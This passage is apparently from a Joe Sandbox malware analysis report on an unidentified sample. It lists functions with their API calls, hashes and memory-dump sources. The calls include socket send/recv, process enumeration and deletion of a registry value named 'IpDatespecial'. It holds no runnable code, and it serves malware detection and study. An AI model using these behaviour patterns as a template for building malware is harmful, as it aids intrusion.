                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                                                                                                      • Instruction Fuzzy Hash: A011C979D01309DFDF04EFA4D845AAE7BB5FF04311F1084A9E814AB390DB3899559F54
                                                                                                                                                                      Function 02C736A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 02C736CB
                                                                                                                                                                        • Part of subcall function 02C7325B: __getptd.LIBCMT ref: 02C73269
                                                                                                                                                                        • Part of subcall function 02C7325B: __getptd.LIBCMT ref: 02C73277
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736D5
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736E3
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736F1
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C736FC
                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 02C73722
                                                                                                                                                                        • Part of subcall function 02C73300: __CallSettingFrame@12.LIBCMT ref: 02C7334C
                                                                                                                                                                        • Part of subcall function 02C737C9: __getptd.LIBCMT ref: 02C737D8
                                                                                                                                                                        • Part of subcall function 02C737C9: __getptd.LIBCMT ref: 02C737E6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                      • Opcode ID: c11137feeac243ddddcf5d0cd71b4ab0059f2c3ba62eeb55c2b7bd41880d4e8e
                                                                                                                                                                      • Instruction ID: 1c0c6671c9ac45b103591b610980bfa617c447502645336d45b33e0eca07b541
                                                                                                                                                                      • Opcode Fuzzy Hash: c11137feeac243ddddcf5d0cd71b4ab0059f2c3ba62eeb55c2b7bd41880d4e8e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C11D7B1C00249DFDB00EFA4D589BAD7BB2FF04314F1085A9E868A7250DB399A15EF54
                                                                                                                                                                      Function 03784885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 03784891
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 037848B1
                                                                                                                                                                      • __lock.LIBCMT ref: 037848C1
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 037848DE
                                                                                                                                                                      • _free.LIBCMT ref: 037848F1
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(03A01658), ref: 03784909
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                      • Opcode ID: c81e7dbe2b1380e14a052412eb8e1506e3245f4cd85bae099a6e90cf0dae973d
                                                                                                                                                                      • Instruction ID: d92595acb4106211ced210fe06455943ff8b0ace643545c6d7990eef2a02c72b
                                                                                                                                                                      • Opcode Fuzzy Hash: c81e7dbe2b1380e14a052412eb8e1506e3245f4cd85bae099a6e90cf0dae973d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7601D635D81B53EBFB20FF26940875DB3A0BF04B10F09461AD910AB280CBB45442DBD2
                                                                                                                                                                      Function 02C6D9BE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6D9CA
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C6D9EA
                                                                                                                                                                      • __lock.LIBCMT ref: 02C6D9FA
                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02C6DA17
                                                                                                                                                                      • _free.LIBCMT ref: 02C6DA2A
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(03031658), ref: 02C6DA42
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                      • Opcode ID: 203738294b941d6d9212e94a88443409c9a5dbe14f5b66766454be2c429167d4
                                                                                                                                                                      • Instruction ID: f607e6124e5a8fd8cc8969f900acf85c188b0ed843b911756848b63834733a44
                                                                                                                                                                      • Opcode Fuzzy Hash: 203738294b941d6d9212e94a88443409c9a5dbe14f5b66766454be2c429167d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2901F572F857219BD720AF6594CC77DB362BF40710F054205D822A7280CB34A655EFD6
                                                                                                                                                                      Function 02C648C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C648EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C648F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C64914
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C6491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C6492E
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                      • Opcode ID: b991122375e3451f4354ed1a68d2ab14b491a1e5faac29fdbef1d4ecec269b5c
                                                                                                                                                                      • Instruction ID: d06a15bb676ec2425f6a6a560d1a7f2d223b2dc31b8cbbd2e999b29417f0358b
                                                                                                                                                                      • Opcode Fuzzy Hash: b991122375e3451f4354ed1a68d2ab14b491a1e5faac29fdbef1d4ecec269b5c
                                                                                                                                                                      • Instruction Fuzzy Hash: 41F090322046045BC224EBA9DCC4E4AF3E9EFC9760B204B09E26987690CA71E805CBE0
                                                                                                                                                                      Function 03779BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 03779BD2
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BE3
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BF8
                                                                                                                                                                      • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03779B7B), ref: 03779C04
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C15
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C1C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4268643673-0
                                                                                                                                                                      • Opcode ID: 130077e5be1142c12f0a709ed41b338bb99cfd8dc57e9b55a50b24901cff67ce
                                                                                                                                                                      • Instruction ID: 4d0cd81e7e4b7491d17b6e917e77d02c631c91f7086f3aed2dd4a3fc27163e96
                                                                                                                                                                      • Opcode Fuzzy Hash: 130077e5be1142c12f0a709ed41b338bb99cfd8dc57e9b55a50b24901cff67ce
                                                                                                                                                                      • Instruction Fuzzy Hash: A101C8B1901709EFDF14EF7AA894415BBA4FA4962637587AFE118CA246C376C403CF94
                                                                                                                                                                      Function 037748D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037748E1
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037748EC
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 037748F9
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03774914
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377491D
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0377492E
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                      • Opcode ID: d72eefbd91eca07d23b3898d45c80b1d5ed4d6834e74c92312c178edcca737b5
                                                                                                                                                                      • Instruction ID: a8849f8e8b033d4ee3f8f59bc8bf7f6cce1d8885c3b9e00b7d2d2858b44a4e1b
                                                                                                                                                                      • Opcode Fuzzy Hash: d72eefbd91eca07d23b3898d45c80b1d5ed4d6834e74c92312c178edcca737b5
                                                                                                                                                                      • Instruction Fuzzy Hash: DCF036763046096BC614FB69DC84D46F3E9EFC9720B158B09E26587295CA75E802CBA0
                                                                                                                                                                      Function 03773300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03773311
                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 0377331E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03773326
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03773332
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0377333A
                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0377334B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                      • Opcode ID: 45e04b75a5e4fe16a67f5a7efe2c4ff462f5948b0df843ef8d515748db0e4d98
                                                                                                                                                                      • Instruction ID: 1a44b3296a0a431e0aebe0dd261713a6361de137a2e9e790def0ead4bcff2050
                                                                                                                                                                      • Opcode Fuzzy Hash: 45e04b75a5e4fe16a67f5a7efe2c4ff462f5948b0df843ef8d515748db0e4d98
                                                                                                                                                                      • Instruction Fuzzy Hash: B6F089712043086BD610FBA9DC84D46F3E8EF85334B114B09F221872D5CAB4E801CB60
                                                                                                                                                                      Function 0379095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 0379096E
                                                                                                                                                                        • Part of subcall function 037908C9: ___BuildCatchObjectHelper.LIBCMT ref: 037908FF
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 03790985
                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 03790993
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                      • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                      • Instruction ID: 27a647580fef62f6ba35aaafcbcfe706788075d8c73d3895f07dc65d5860a00b
                                                                                                                                                                      • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                      • Instruction Fuzzy Hash: CB01FB75411209BBEF12AF51EC48EAA7F6AEF09350F048115FD5859120D736D9B1DBA0
                                                                                                                                                                      Function 02C73A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02C73A63
                                                                                                                                                                        • Part of subcall function 02C739BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C739F4
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02C73A7A
                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 02C73A88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                      • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                      • Instruction ID: 6d0c937d8d4da314476303535025ad0f215f414fb67b7e40794d856fe13961fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                      • Instruction Fuzzy Hash: 8601EF31041149BBDF12AFA1CC49EAA7E6AFF48364F008054BD5816220DB369AB1EBA1
                                                                                                                                                                      Function 0377B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0377B800
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0377B810
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377B81B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                      • API String ID: 849931509-1840232981
                                                                                                                                                                      • Opcode ID: d2064810311a183614618dd7380c5f61b938c1e2c1ccb04b7d8ba20b609359b6
                                                                                                                                                                      • Instruction ID: 69493ed3f4c40dad512f9d39043046074e7fe237d0544f6a41d3e1f327fcd22c
                                                                                                                                                                      • Opcode Fuzzy Hash: d2064810311a183614618dd7380c5f61b938c1e2c1ccb04b7d8ba20b609359b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 57E0DF72204208BFE210A764AC0BF997354E788311F008A4FF684A11428155A001C765
                                                                                                                                                                      Function 0377B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,A0516FA3), ref: 0377B9DA
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B9FB
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BA4B
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0377BA65
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0377BAB7
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2416807333-0
                                                                                                                                                                      • Opcode ID: de6abc87a319a8ec84a999be09a8dc58ce3af9e668406e5e0110b537e2f3920d
                                                                                                                                                                      • Instruction ID: c2b88df49afc68fb75131c3908d39ce58911bada44923ee62f252c80403e85fc
                                                                                                                                                                      • Opcode Fuzzy Hash: de6abc87a319a8ec84a999be09a8dc58ce3af9e668406e5e0110b537e2f3920d
                                                                                                                                                                      • Instruction Fuzzy Hash: E941E771940205EFEF20FF60CC89FAAB7B8EF15714F048299E9159B2C1E7759A41CBA1
                                                                                                                                                                      Function 03773CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 03773CBF
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773CFA
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 03773D45
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773D7B
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,0377399F,?,?,00000000,000000FF,00000000), ref: 03773DA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                      • Opcode ID: bdbea695817fed8ddf9f25515e1eb11ba49a708f4ccc95a62241970b24128caf
                                                                                                                                                                      • Instruction ID: 1a63dda92c0de5fa6fc990b5e857751883bed34417d3b1a38497ee2e9ff8fdbc
                                                                                                                                                                      • Opcode Fuzzy Hash: bdbea695817fed8ddf9f25515e1eb11ba49a708f4ccc95a62241970b24128caf
                                                                                                                                                                      • Instruction Fuzzy Hash: FD31047A6042009FFF24EF68D8C8B6977A9FB45320F140267ED09DB28AD731D8819AD1
                                                                                                                                                                      Function 02C63CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 02C63CBF
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63CFA
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 02C63D45
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63D7B
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,02C6399F,?,?,00000000,000000FF,00000000), ref: 02C63DA2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                      • Opcode ID: 7b82938a0c16c7b04a6ace53f3cf30b30904dfb0ecb31bff336cd243d240c5bf
                                                                                                                                                                      • Instruction ID: 84f2283b3b2adc0bfd1690c15f73e61de90c3df7ba5669cbe614ec153efecdfd
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b82938a0c16c7b04a6ace53f3cf30b30904dfb0ecb31bff336cd243d240c5bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 08312972A142409FEB249F28D8CCB79376AFB85724F5006A6FE05CF285D771D884CB91
                                                                                                                                                                      Function 03780EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 03780EF9
